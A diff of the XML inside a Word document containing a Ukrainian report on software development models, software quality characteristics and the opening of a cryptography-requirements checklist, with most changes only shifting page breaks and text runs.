+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>З</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> метою подолання цих недоліків V-образну модель можна модифікувати, включивши в неї ітераційні цикли, призначені для вирішення змін у вимогах за рамками фази аналізу.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -2241,16 +4216,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve">Розробку стратегії, методів і процедур, що складається в створенні нормативних інструкцій, що охоплюють всі етапи проектування, в тому числі, встановлення вимог до системи, програмування, тестування </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>відповідно до потреб конкретного проекту.</w:t>
+        <w:t>Розробку стратегії, методів і процедур, що складається в створенні нормативних інструкцій, що охоплюють всі етапи проектування, в тому числі, встановлення вимог до системи, програмування, тестування відповідно до потреб конкретного проекту.</w:t>
       </w:r>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
@@ -2435,6 +4401,20 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
     </w:p>
@@ -2460,6 +4440,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>ОГЛЯД</w:t>
       </w:r>
       <w:r>
@@ -2673,17 +4654,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
-        <w:t xml:space="preserve">язана з характеристиками ПЗ самого по собі, без урахування його поведінки, зовнішньої якості, що характеризує ПЗ з точки зору його </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="uk-UA"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">поведінки, та якості ПЗ при використанні в різних умовах – та якість, яку відчуває користувач за конкретних сценаріїв роботи ПЗ. Для всіх цих поглядів на якість було введено метрики, які дозволяють оцінити його. Також при розробці якісного ПЗ важливою є якість технологічних процесів його розробки. Відношення між цими складовими якості по схемі, прийнятій в </w:t>
+        <w:t xml:space="preserve">язана з характеристиками ПЗ самого по собі, без урахування його поведінки, зовнішньої якості, що характеризує ПЗ з точки зору його поведінки, та якості ПЗ при використанні в різних умовах – та якість, яку відчуває користувач за конкретних сценаріїв роботи ПЗ. Для всіх цих поглядів на якість було введено метрики, які дозволяють оцінити його. Також при розробці якісного ПЗ важливою є якість технологічних процесів його розробки. Відношення між цими складовими якості по схемі, прийнятій в </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2884,7 +4855,17 @@
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
-        <w:t xml:space="preserve">використовує для опису внутрішньої та зовнішньої якості ПЗ багаторівневу модель. На верхньому рівні виділено 6 основних характеристик якості ПЗ. Кожна характеристика описана за допомогою атрибутів, що до неї входять. У кожного атрибута є набір метрик, що дозволяє оцінити цей атрибут. На Рис. 1.2 наведено набір характеристик та атрибутів , визначених в </w:t>
+        <w:t xml:space="preserve">використовує для опису внутрішньої та зовнішньої якості ПЗ багаторівневу модель. На верхньому рівні виділено 6 основних </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">характеристик якості ПЗ. Кожна характеристика описана за допомогою атрибутів, що до неї входять. У кожного атрибута є набір метрик, що дозволяє оцінити цей атрибут. На Рис. 1.2 наведено набір характеристик та атрибутів , визначених в </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2920,7 +4901,6 @@
           <w:noProof/>
           <w:lang w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E4EA28B" wp14:editId="49BE5E60">
             <wp:extent cx="3514725" cy="3232140"/>
@@ -3232,6 +5212,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve"> Відповідність стандартам і правилам (compliance). Відповідність ПО наявними індустріальним стандартам, нормативним і законодавчим актам, іншим регулюючим нормам.</w:t>
       </w:r>
     </w:p>
@@ -3255,7 +5236,6 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve"> Захищеність (security). Здатність запобігати неавторизований, тобто без зазначення особи, що намагається його здійснити, і не дозволений доступ до даних і програм.</w:t>
       </w:r>
     </w:p>
@@ -3567,6 +5547,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Відповідність стандартам зручності використання (usability compliance).</w:t>
       </w:r>
     </w:p>
@@ -3590,16 +5571,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve">Продуктивність (efficiency) або ефективність. Здатність ПЗ при заданих умовах забезпечувати необхідну працездатність стосовно виділеним для </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">цього ресурсів. Можна визначити її і як відношення одержуваних за допомогою ПЗ результатів </w:t>
+        <w:t xml:space="preserve">Продуктивність (efficiency) або ефективність. Здатність ПЗ при заданих умовах забезпечувати необхідну працездатність стосовно виділеним для цього ресурсів. Можна визначити її і як відношення одержуваних за допомогою ПЗ результатів </w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
@@ -3919,6 +5891,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Адаптируемость (adaptability). Здатність ПЗ пристосовуватися до </w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
@@ -3960,7 +5933,6 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Зручність установки (installability). Здатність ПЗ бути встановленим або розгорнутим в певному оточенні.</w:t>
       </w:r>
     </w:p>
@@ -19566,7 +21538,54 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -19578,6 +21597,7 @@
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>V</w:t>
       </w:r>
       <w:r>
@@ -19602,6 +21622,2063 @@
         <w:t>Вимоги до криптографії та шифування</w:t>
       </w:r>
     </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="a8"/>
+        <w:tblW w:w="0" w:type="auto"/>
+        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="738"/>
+        <w:gridCol w:w="7110"/>
+        <w:gridCol w:w="630"/>
+        <w:gridCol w:w="540"/>
+        <w:gridCol w:w="553"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="738" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:tabs>
+                <w:tab w:val="left" w:pos="916"/>
+                <w:tab w:val="left" w:pos="1832"/>
+                <w:tab w:val="left" w:pos="2748"/>
+                <w:tab w:val="left" w:pos="3664"/>
+                <w:tab w:val="left" w:pos="4580"/>
+                <w:tab w:val="left" w:pos="5496"/>
+                <w:tab w:val="left" w:pos="6412"/>
+                <w:tab w:val="left" w:pos="7328"/>
+                <w:tab w:val="left" w:pos="8244"/>
+                <w:tab w:val="left" w:pos="9160"/>
+                <w:tab w:val="left" w:pos="10076"/>
+                <w:tab w:val="left" w:pos="10992"/>
+                <w:tab w:val="left" w:pos="11908"/>
+                <w:tab w:val="left" w:pos="12824"/>
+                <w:tab w:val="left" w:pos="13740"/>
+                <w:tab w:val="left" w:pos="14656"/>
+              </w:tabs>
+              <w:spacing w:line="360" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>#</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="7110" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:tabs>
+                <w:tab w:val="left" w:pos="916"/>
+                <w:tab w:val="left" w:pos="1832"/>
+                <w:tab w:val="left" w:pos="2748"/>
+                <w:tab w:val="left" w:pos="3664"/>
+                <w:tab w:val="left" w:pos="4580"/>
+                <w:tab w:val="left" w:pos="5496"/>
+                <w:tab w:val="left" w:pos="6412"/>
+                <w:tab w:val="left" w:pos="7328"/>
+                <w:tab w:val="left" w:pos="8244"/>
+                <w:tab w:val="left" w:pos="9160"/>
+                <w:tab w:val="left" w:pos="10076"/>
+                <w:tab w:val="left" w:pos="10992"/>
+                <w:tab w:val="left" w:pos="11908"/>
+                <w:tab w:val="left" w:pos="12824"/>
+                <w:tab w:val="left" w:pos="13740"/>
+                <w:tab w:val="left" w:pos="14656"/>
+              </w:tabs>
+              <w:spacing w:line="360" w:lineRule="auto"/>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>Опис</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="630" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:tabs>
+                <w:tab w:val="left" w:pos="916"/>
+                <w:tab w:val="left" w:pos="1832"/>
+                <w:tab w:val="left" w:pos="2748"/>
+                <w:tab w:val="left" w:pos="3664"/>
+                <w:tab w:val="left" w:pos="4580"/>
+                <w:tab w:val="left" w:pos="5496"/>
+                <w:tab w:val="left" w:pos="6412"/>
+                <w:tab w:val="left" w:pos="7328"/>
+                <w:tab w:val="left" w:pos="8244"/>
+                <w:tab w:val="left" w:pos="9160"/>
+                <w:tab w:val="left" w:pos="10076"/>
+                <w:tab w:val="left" w:pos="10992"/>
+                <w:tab w:val="left" w:pos="11908"/>
+                <w:tab w:val="left" w:pos="12824"/>
+                <w:tab w:val="left" w:pos="13740"/>
+                <w:tab w:val="left" w:pos="14656"/>
+              </w:tabs>
+              <w:spacing w:line="360" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>1</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="540" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:tabs>
+                <w:tab w:val="left" w:pos="916"/>
+                <w:tab w:val="left" w:pos="1832"/>
+                <w:tab w:val="left" w:pos="2748"/>
+                <w:tab w:val="left" w:pos="3664"/>
+                <w:tab w:val="left" w:pos="4580"/>
+                <w:tab w:val="left" w:pos="5496"/>
+                <w:tab w:val="left" w:pos="6412"/>
+                <w:tab w:val="left" w:pos="7328"/>
+                <w:tab w:val="left" w:pos="8244"/>
+                <w:tab w:val="left" w:pos="9160"/>
+                <w:tab w:val="left" w:pos="10076"/>
+                <w:tab w:val="left" w:pos="10992"/>
+                <w:tab w:val="left" w:pos="11908"/>
+                <w:tab w:val="left" w:pos="12824"/>
+                <w:tab w:val="left" w:pos="13740"/>
+                <w:tab w:val="left" w:pos="14656"/>
+              </w:tabs>
+              <w:spacing w:line="360" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>2</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="553" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:tabs>
+                <w:tab w:val="left" w:pos="916"/>
+                <w:tab w:val="left" w:pos="1832"/>
+                <w:tab w:val="left" w:pos="2748"/>
+                <w:tab w:val="left" w:pos="3664"/>
+                <w:tab w:val="left" w:pos="4580"/>
+                <w:tab w:val="left" w:pos="5496"/>
+                <w:tab w:val="left" w:pos="6412"/>
+                <w:tab w:val="left" w:pos="7328"/>
+                <w:tab w:val="left" w:pos="8244"/>
+                <w:tab w:val="left" w:pos="9160"/>
+                <w:tab w:val="left" w:pos="10076"/>
+                <w:tab w:val="left" w:pos="10992"/>
+                <w:tab w:val="left" w:pos="11908"/>
+                <w:tab w:val="left" w:pos="12824"/>
+                <w:tab w:val="left" w:pos="13740"/>
+                <w:tab w:val="left" w:pos="14656"/>
+              </w:tabs>
+              <w:spacing w:line="360" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>3</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="738" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:tabs>
+                <w:tab w:val="left" w:pos="916"/>
+                <w:tab w:val="left" w:pos="1832"/>
+                <w:tab w:val="left" w:pos="2748"/>
+                <w:tab w:val="left" w:pos="3664"/>
+                <w:tab w:val="left" w:pos="4580"/>
+                <w:tab w:val="left" w:pos="5496"/>
+                <w:tab w:val="left" w:pos="6412"/>
+                <w:tab w:val="left" w:pos="7328"/>
+                <w:tab w:val="left" w:pos="8244"/>
+                <w:tab w:val="left" w:pos="9160"/>
+                <w:tab w:val="left" w:pos="10076"/>
+                <w:tab w:val="left" w:pos="10992"/>
+                <w:tab w:val="left" w:pos="11908"/>
+                <w:tab w:val="left" w:pos="12824"/>
+                <w:tab w:val="left" w:pos="13740"/>
+                <w:tab w:val="left" w:pos="14656"/>
+              </w:tabs>
+              <w:spacing w:line="360" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>5</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>.1</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="7110" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:tabs>
+                <w:tab w:val="left" w:pos="916"/>
+                <w:tab w:val="left" w:pos="1832"/>
+                <w:tab w:val="left" w:pos="2748"/>
+                <w:tab w:val="left" w:pos="3664"/>
+                <w:tab w:val="left" w:pos="4580"/>
+                <w:tab w:val="left" w:pos="5496"/>
+                <w:tab w:val="left" w:pos="6412"/>
+                <w:tab w:val="left" w:pos="7328"/>
+                <w:tab w:val="left" w:pos="8244"/>
+                <w:tab w:val="left" w:pos="9160"/>
+                <w:tab w:val="left" w:pos="10076"/>
+                <w:tab w:val="left" w:pos="10992"/>
+                <w:tab w:val="left" w:pos="11908"/>
+                <w:tab w:val="left" w:pos="12824"/>
+                <w:tab w:val="left" w:pos="13740"/>
+                <w:tab w:val="left" w:pos="14656"/>
+              </w:tabs>
+              <w:spacing w:line="360" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Переконайтеся, що всі випадкові числа, випадкові імена файлів, випадковий </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>GUIDs</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> і випадкові рядки генеруються з використанням криптографічних модулів схваленого генератор</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>а</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> випадкових чисел, коли ці випадкові значення призначені </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>не бути вгаданими</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> зловмисником</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="630" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:tabs>
+                <w:tab w:val="left" w:pos="916"/>
+                <w:tab w:val="left" w:pos="1832"/>
+                <w:tab w:val="left" w:pos="2748"/>
+                <w:tab w:val="left" w:pos="3664"/>
+                <w:tab w:val="left" w:pos="4580"/>
+                <w:tab w:val="left" w:pos="5496"/>
+                <w:tab w:val="left" w:pos="6412"/>
+                <w:tab w:val="left" w:pos="7328"/>
+                <w:tab w:val="left" w:pos="8244"/>
+                <w:tab w:val="left" w:pos="9160"/>
+                <w:tab w:val="left" w:pos="10076"/>
+                <w:tab w:val="left" w:pos="10992"/>
+                <w:tab w:val="left" w:pos="11908"/>
+                <w:tab w:val="left" w:pos="12824"/>
+                <w:tab w:val="left" w:pos="13740"/>
+                <w:tab w:val="left" w:pos="14656"/>
+              </w:tabs>
+              <w:spacing w:line="360" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="540" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:tabs>
+                <w:tab w:val="left" w:pos="916"/>
+                <w:tab w:val="left" w:pos="1832"/>
+                <w:tab w:val="left" w:pos="2748"/>
+                <w:tab w:val="left" w:pos="3664"/>
+                <w:tab w:val="left" w:pos="4580"/>
+                <w:tab w:val="left" w:pos="5496"/>
+                <w:tab w:val="left" w:pos="6412"/>
+                <w:tab w:val="left" w:pos="7328"/>
+                <w:tab w:val="left" w:pos="8244"/>
+                <w:tab w:val="left" w:pos="9160"/>
+                <w:tab w:val="left" w:pos="10076"/>
+                <w:tab w:val="left" w:pos="10992"/>
+                <w:tab w:val="left" w:pos="11908"/>
+                <w:tab w:val="left" w:pos="12824"/>
+                <w:tab w:val="left" w:pos="13740"/>
+                <w:tab w:val="left" w:pos="14656"/>
+              </w:tabs>
+              <w:spacing w:line="360" w:lineRule="auto"/>
+              <w:rPr>
